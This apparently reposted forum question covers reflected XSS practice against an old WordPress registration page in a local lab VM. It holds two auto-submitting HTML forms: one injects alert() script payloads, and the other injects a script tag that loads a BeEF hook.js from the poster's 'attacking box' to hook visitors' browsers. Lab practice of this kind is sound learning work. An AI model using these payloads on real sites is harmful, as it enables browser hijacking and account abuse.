Tuesday, 15 September 2020

Loading external JS script in POST parameter (XSS Reflected attack)

I'm testing on my vbox machines some xss attacks, just for fun! I have two .html files one works and the other not.

The file which works is:

<html>
<head></head>
<body>
<form method="post" action="http://192.168.56.17/wordpress/wp-register.php" >
<input type="hidden" name="action" value="register" />
<input type="hidden" name="user_login" id="user_login"
value='"><script>alert(1)</script>' />
<input type="hidden" name="user_email" id="user_email"
value='"><script>alert(2)</script>' />
</form>
<script>document.forms[0].submit()</script>
</body>
</html>

http://192.168.56.17 is the OWASPBWA machines of vulnhub, which is installed an old WP installation with XSS flaw on register.php

This works. If i call this .html file from another client, let me say 192.168.56.1,for example, i see the javascript alert!

But if i try something nasty, for example hooking beef-xss, the follow code doesn't work:

<html>
<head></head>
<body>
<form method="post" action="http://192.168.56.17/wordpress/wp-register.php" >
<input type="hidden" name="action" value="register" />
<input type="hidden" name="user_login" id="user_login"
value='">example' />
<input type="hidden" name="user_email" id="user_email"
value='"><script src="http://192.168.56.101:3000/hook.js"></script>' />
</form>
<script>document.forms[0].submit()</script>
</body>
</html>

192.168.56.101 is my attacking box.

Thanks for helping



from Loading external JS script in POST parameter (XSS Reflected attack)
Posted by at
Labels:

No comments:

Post a Comment

Subscribe to: Post Comments (Atom)